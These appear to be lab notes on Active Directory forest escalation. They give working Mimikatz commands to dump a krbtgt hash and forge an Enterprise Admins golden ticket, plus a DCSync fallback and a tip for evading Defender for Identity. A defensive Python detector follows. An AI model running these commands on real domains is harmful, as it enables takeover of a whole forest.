Using KRBTGT Hash

We abuse sIDHistory again. First, we dump credentials on dcorp-dc and obtain the krbtgt hash.

Invoke-Mimikatz -Command '"lsadump::lsa /patch"'

We can then forge the inter-realm TGT for Administrator and inject it into the current session.

C:\AD\Tools\BetterSafetyKatz.exe "kerberos::golden /user:Administrator /domain:dollarcorp.moneycorp.local /sid:S-1-5-21-719815819-3726368948-3917688648 /sids:S-1-5-21-335606122-960912869-3279953914-519 /krbtgt:4e9815869d2090ccfca61c1fe0d23986 /ptt" "exit"

In the above command, the mimikatz option "/sids" forcibly sets the sIDHistory of the forged ticket for dollarcorp.moneycorp.local to the Enterprise Admins group, which is the forest Enterprise Admins group.

We can now access mcorp:

winrs -r:mcorp-dc.moneycorp.local cmd

  • On any machine of the current domain, inject the saved ticket:

Invoke-Mimikatz -Command '"kerberos::ptt C:\AD\Tools\krbtgt_tkt.kirbi"'

  • We can now run commands on the remote machine:

ls \\mcorp-dc.moneycorp.local\c$
gwmi -class win32_operatingsystem -ComputerName mcorp-dc.moneycorp.local
  • If you can't get a shell on the remote system with winrs (you get an error like the one in the screenshot below), here is what to do to get a shell 🤟 (DCSync):

  1. Run the DCSync attack against the krbtgt hash of the forest root.

  2. Now use over-pass-the-hash to start a process as Administrator of moneycorp.local, the domain we want the request to be sent to.

  • You should now have a new process running as domain administrator of mcorp-dc. Run the winrs command again and you should have shell access.

  • Avoid suspicious logs by using the Domain Controllers group (bypasses MDI detection). Note: /user:dcorp-dc$ used to work earlier (until April 2023), but now we need to use /user:Administrator.

Domain SIDs:

  • S-1-5-21-2578538781-2508153159-3419410681-516 - Domain Controllers

  • S-1-5-9 - Enterprise Domain Controllers
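As an added example that is not part of these notes, the following Python triage helper flags the SID-history pattern the commands above produce: a privileged RID (519 Enterprise Admins, 516 Domain Controllers) arriving from a domain other than the account's own, or the well-known S-1-5-9 on a non-computer account. The record layout and the `scan` helper are assumptions standing in for an authentication audit export, the rules are heuristics rather than MDI's own logic, and the SIDs are the ones quoted on this page.

```python
import re

# Constructed triage helper (assumed export shape, not a specific Windows event):
# flag SID-history / ExtraSids entries that grant privileged membership in a
# domain other than the account's own.
PRIVILEGED_RIDS = {519: "Enterprise Admins", 516: "Domain Controllers", 512: "Domain Admins"}
ENTERPRISE_DCS = "S-1-5-9"  # well-known, no domain part; a plain user account should never carry it
DOMAIN_SID_RE = re.compile(r"^(S-1-5-21-\d+-\d+-\d+)-(\d+)$")

def split_sid(sid):
    """Return (domain_sid, rid) for a domain SID, else (None, None)."""
    m = DOMAIN_SID_RE.match(sid)
    return (m.group(1), int(m.group(2))) if m else (None, None)

def suspicious_extra_sids(account, account_domain_sid, extra_sids):
    """Return (sid, group, reason) for each SID-history entry worth an alert."""
    findings = []
    is_computer = account.split("@", 1)[0].endswith("$")
    for sid in extra_sids:
        if sid == ENTERPRISE_DCS and not is_computer:
            findings.append((sid, "Enterprise Domain Controllers", "well-known DC SID on a user account"))
            continue
        dom, rid = split_sid(sid)
        if dom and dom != account_domain_sid and rid in PRIVILEGED_RIDS:
            findings.append((sid, PRIVILEGED_RIDS[rid], "privileged RID from a foreign domain"))
    return findings

# Constructed sample records; the SIDs are the ones quoted on this page.
DCORP_SID = "S-1-5-21-719815819-3726368948-3917688648"
SAMPLE_RECORDS = [
    {"account": "Administrator@dollarcorp.moneycorp.local", "domain_sid": DCORP_SID,
     "extra_sids": ["S-1-5-21-335606122-960912869-3279953914-519"]},  # forest-root EA RID injected via /sids
    {"account": "Administrator@dollarcorp.moneycorp.local", "domain_sid": DCORP_SID,
     "extra_sids": ["S-1-5-21-2578538781-2508153159-3419410681-516", "S-1-5-9"]},  # DC group plus Enterprise DCs
    {"account": "dcorp-dc$@dollarcorp.moneycorp.local", "domain_sid": DCORP_SID,
     "extra_sids": ["S-1-5-9"]},  # DC computer account, expected to carry S-1-5-9
    {"account": "svc@dollarcorp.moneycorp.local", "domain_sid": DCORP_SID,
     "extra_sids": [DCORP_SID + "-1105"]},  # own domain, ordinary RID: benign
]

def scan(records):
    """Return [(account, findings)] for every record that trips at least one rule."""
    results = []
    for r in records:
        hits = suspicious_extra_sids(r["account"], r["domain_sid"], r["extra_sids"])
        if hits:
            results.append((r["account"], hits))
    return results
```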